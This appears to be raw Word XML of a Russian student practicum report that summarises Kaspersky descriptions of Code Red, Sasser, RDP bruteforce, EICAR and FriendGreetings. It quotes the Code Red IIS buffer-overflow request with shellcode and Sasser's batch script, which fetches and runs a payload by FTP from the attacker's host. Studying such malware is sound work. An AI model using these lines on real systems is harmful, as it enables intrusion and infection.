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0563c1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5917565" cy="1087120"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="имени вострухина@0,5x" id="7" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="имени вострухина@0,5x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12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Дисциплина: Учебная практика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выполнению задания на тему: «…».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6521" w:right="-29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студенты:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="6521" w:right="-291" w:firstLine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Кипер Тудор и Локоченко Николай</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="652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преподаватель:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="6521" w:right="-291" w:firstLine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Магомедов Э.М.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.kaspersky.ru/blog/history-lessons-code-red/33795/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Сайт ссылка на источник)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Принципы работы Code Red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Интернет-червь использовал тривиальнейшую уязвимость в одном из модулей веб-сервера, а точнее, расширении для индексации данных. В библиотеке idq.dll была обнаружена ошибка переполнения буфера. Уязвимость получила идентификатор MS01-33. По современным меркам это простейшая ошибка, которую можно проэксплуатировать, отправив на сервер чрезмерно длинный запрос такого вида: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GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0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 результате данные после многочисленных символов N интерпретируются как инструкции и выполняются. Вся вредоносная нагрузка содержится непосредственно в запросе, то есть при наличии уязвимой инсталляции Microsoft IIS система заражается моментально и со стопроцентной гарантией. Самым заметным следствием заражения становился дефейс веб-сайта, обслуживаемого веб-сервером. Вместо его содержимого выводилась вот такая заглушка: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044877" cy="3543607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543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Устранение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 информации «Лаборатории Касперского», дефейс был не перманентный: через 10 часов после успешной атаки червь восстанавливал нормальное содержимое веб-сайта. Дальнейшие действия зависели от даты. С 1 по 19 число каждого месяца червь занимался собственным распространением, отправляя вредоносные запросы по случайным IP-адресам. С 20 по 27 число производилась DDoS-атака на ряд фиксированных IP-адресов, среди которых был адрес сайта администрации президента США. С 28 числа до конца месяца у Code Red были выходные.</w:t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Не только Code Red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Red сошел со сцены достаточно быстро. В августе 2001 года появилась слегка измененная версия Code Red II, способная заражать системы, где уже «сидел» первый вариант червя. Но вообще в начале нулевых было немало и других атак с похожими сценариями. Уже в сентябре 2001 года произошла эпидемия интернет-червя Nimda, также эксплуатирующего давно пропатченные уязвимости в Microsoft IIS. В 2003 году активно распространялся червь Blaster. Стало очевидно, что патчи для критических уязвимостей в корпоративном ПО надо устанавливать как можно быстрее: сразу после выхода апдейта злоумышленники тщательно анализируют его и незамедлительно начинают эксплуатировать закрытую им уязвимость, пока большинство пользователей не установили обновления. Причем и сейчас нельзя сказать, что эта проблема решена. Есть и более свежие примеры, такие как атака WannaCry 2017 года — там тоже была использована давно известная, но не закрытая уязвимость.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Однако Code Red и прочие многочисленные вредоносные программы, заражавшие сотни тысяч систем по всему миру, отчасти помогли сформировать те подходы к корпоративной безопасности, которыми мы руководствуемся сейчас. Во многом благодаря им мы научились защищаться от кибератак. Впрочем, серебряной пули, решающей все проблемы бизнеса в киберпространстве, пока никто не придумал. Поэтому мы постоянно продолжаем совершенствовать технологии информационной безопасности. Эволюция киберзащиты — это необходимый путь к совершенству систем безопасности, в котором невозможно достичь идеала и успокоиться.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hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:sz w:val="48"/>
            <w:szCs w:val="48"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://threats.kaspersky.com/ru/threat/Net-Worm.Win32.Sasser/</w:t>
        </w:r>
      </w:hyperlink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(Сайт ссылка на источник)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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0" distT="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="273304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0" distT="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="187769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7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echo off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023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echo open [адрес машины с которой производится атака] 5554&gt;&gt;cmd.ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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echo anonymous&gt;&gt;cmd.ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B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echo user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F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echo bin&gt;&gt;cmd.ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033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echo get [произвольное число]_up.exe&gt;&gt;cmd.ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037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echo bye&gt;&gt;cmd.ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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echo on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F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ftp -s:cmd.ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043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[произвольное число]_up.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047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echo off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B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del cmd.ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F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echo 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MuseoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300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useoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300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t xml:space="preserve">Таким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например: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23101_up.exe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5409_up.exe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MuseoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300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useoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300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t xml:space="preserve">и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:before="900" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MuseoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="MuseoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300"/>
          <w:color w:val="333333"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Прочее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MuseoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300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useoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300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t xml:space="preserve">После заражения инфицированная машина выводит сообщение об ошибке LSASS service failing, после чего может попытаться перезагрузиться.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MuseoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300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MuseoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300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t xml:space="preserve">Червь создает в корневом каталоге диска C: файл “win.log”, который содержит IP-адреса атакуемых машин.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr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https://threats.kaspersky.com/ru/threat/Bruteforce.Generic.RDP/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Сайт ссылка на источник)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0" distT="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="3086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0" distT="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="18345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4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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://threats.kaspersky.com/ru/threat/DangerousObject.Acad.EICAR-Test-File/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Сайт ссылка на источник)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6120130" cy="295211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2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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://threats.kaspersky.com/ru/threat/Email-Flooder.Win32.FriendGreetings/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Сайт ссылка на источник)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useoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="1838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198620" cy="306324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063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MuseoSansCyrl_300" w:cs="MuseoSansCyrl_300" w:eastAsia="MuseoSansCyrl_300" w:hAnsi="MuseoSansCyrl_300"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">При инсталляции программа предъявляет свой сертификат подлинности. Если пользователь доверяет ее электронной подписи, ему предлагается ознакомиться с лицензионным соглашением (EULA). Если пользователь не согласен с ним или не доверяет сертификату, установка прекращается.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800600" cy="3611880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11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120130" cy="310959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9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1. Где можно взять описание работы компьютерных вирусов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(конкретные примеры)? </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow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https://threats.kaspersky.com/ru/threat/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2. Какие есть пути распространения компьютерных вирусов?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highlight w:val="yellow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ПОЧТА,САЙТЫ,ФАЙЛЫ различных форматов,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3. Какие есть формы проявления компьютерных вирусов?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16"/>
          <w:szCs w:val="16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smallCaps w:val="1"/>
            <w:color w:val="000000"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="none"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ADWARE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;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mallCaps w:val="1"/>
            <w:color w:val="000000"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="none"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BRUTEFORCE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;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mallCaps w:val="1"/>
            <w:color w:val="000000"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="none"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DANGEROUSOBJECT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mallCaps w:val="1"/>
            <w:color w:val="000000"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="none"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">INTRUSION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mallCaps w:val="1"/>
            <w:color w:val="000000"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="none"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MALWARE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Email-Flooder.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4. Какие формы проявления компьютерных вирусов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  <w:t xml:space="preserve">наиболее незаметны для пользователя?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mallCaps w:val="1"/>
            <w:color w:val="000000"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="none"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MALWARE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Email-Flooder.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footerReference r:id="rId25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MuseoSansCyrl_300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Москва 2022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hreats.kaspersky.com/ru/class/Bruteforce/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threats.kaspersky.com/ru/class/Intrusion/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threats.kaspersky.com/ru/class/DangerousObject/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threats.kaspersky.com/ru/class/Malware/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threats.kaspersky.com/ru/class/Malwar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reats.kaspersky.com/ru/threat/Net-Worm.Win32.Sasser/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spersky.ru/blog/history-lessons-code-red/33795/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png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9.jpg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threats.kaspersky.com/ru/class/Adware/" TargetMode="External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